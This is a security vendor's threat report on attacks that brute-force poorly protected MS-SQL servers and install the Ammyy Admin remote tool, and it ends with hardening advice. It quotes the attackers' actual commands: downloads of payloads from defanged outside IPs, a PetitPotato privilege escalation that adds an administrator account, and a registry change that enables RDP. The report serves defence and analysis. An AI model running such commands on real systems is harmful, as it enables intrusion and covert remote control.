Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin
AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool used to control systems remotely along with AnyDesk, ToDesk, TeamViewer, etc.
When these tools are used properly, they enable companies and individuals to manage and control systems remotely. However, because the feature to control systems remotely is the same as what backdoors and RAT malware provide, threat actors may exploit these legitimate tools for malicious purposes. In fact, AnyDesk is commonly exploited in attacks targeting MS-SQL servers. AhnLab SEcurity intelligence Center (ASEC) has published a post about a case where GotoHTTP was exploited in an attack.[2]
In the case of Windows systems, MS-SQL servers are prime targets for attacks. Threat actors scan for poorly managed and vulnerable MS-SQL servers, and when they successfully gain control, they install malware. The targeted system is exposed to the public and is believed to be using weak credentials. After successfully launching an attack, the threat actors executed the following commands to collect information on the infected system.
| > whoami > net1 user > netstat -an > wmic cpu get name,NumberOfCores |
Figure 1. Command execution logs
Then, the threat actor installed WGet and used it to install additional malware. The installed malware include Ammyy Admin (mscorsvw.exe), the settings file for Ammyy Admin (settings3.bin), and PetitPotato (p.ax).
| > %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\mscorsvw.exe hxxp://110.45.186[.]8/aa_v3_protected.exe > %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\mscorsvw.exe hxxp://110.45.186[.]8/mscorsvw.log > %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\mscorsvw.exe hxxp://1.220.228[.]82/mscorsvw1.log > %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\settings3.bin hxxp://1.220.228[.]82/settings3.bin > %USERPROFILE%\Libraries\get.exe -O c:\Users\%AhnLab Smart Defense (ASD)%\Libraries\p.ax hxxp://110.45.186[.]8/p.log |
Like other remote control tools, Ammyy Admin provides remote screen control. If the tool is installed on an infected system, the threat actor can use the “Client ID” and “Password” to remotely control the system.
Figure 2. Remote control using Ammyy Admin
The Ammyy Admin version used in the attack is v3.10, an old version. Ways to exploit such version are already known. First, it can be configured to allow users to log in with a specific password on all computers. Then, when the created settings file “settings3.bin” is used as the settings file for Ammyy Admin on the infected system, the threat actor can control the infected system remotely if they only know the Client ID. The publicly known exploitation method involves extracting the Client ID from the memory and using it. However, the specific method used by the threat actor has not been identified.
Figure 3. Ammyy Admin setup file distributed by the threat actor
They also attempted to access the infected system remotely. To do this, the threat actor utilized the privilege escalation tool PetitPotato to add a new user and activate the RDP service.
| > %USERPROFILE%\Libraries\p.ax 0 “net1 user a 12[REMOVED]C!@# /ad” > reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f |
The main attacks on MS-SQL servers are brute force and dictionary attacks against systems that manage account credentials poorly. Administrators must use passwords that are difficult to guess and change them regularly to protect their database servers from brute force and dictionary attacks.
Users must also update to the latest version of V3 to prevent malware infection. It is also necessary to use security products such as firewalls to control access from external threat actors to database servers that are publicly accessible. If these measures are not taken, the threat actor and malware may continue to infect the system.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
